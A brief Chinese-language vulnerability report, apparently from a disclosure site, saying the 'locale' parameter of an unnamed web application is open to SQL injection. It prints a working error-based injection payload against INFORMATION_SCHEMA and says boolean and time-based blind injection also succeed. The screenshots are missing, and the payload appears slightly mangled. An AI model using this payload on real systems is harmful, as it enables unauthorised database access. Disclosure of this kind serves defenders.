http://localhost/[PATH]/locale?locale=SQL
locale参数存在sql注入
其中报错注入如下:
payload:
[http://localhost/PATH]/locale?locale=1' AND (SELECT 3507 FROM(SELECT COUNT(),CONCAT(FLOOR(RAND(0)2),md5(233))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Lilt
测试截图:

布尔盲注和时间盲注如下:

暂无评论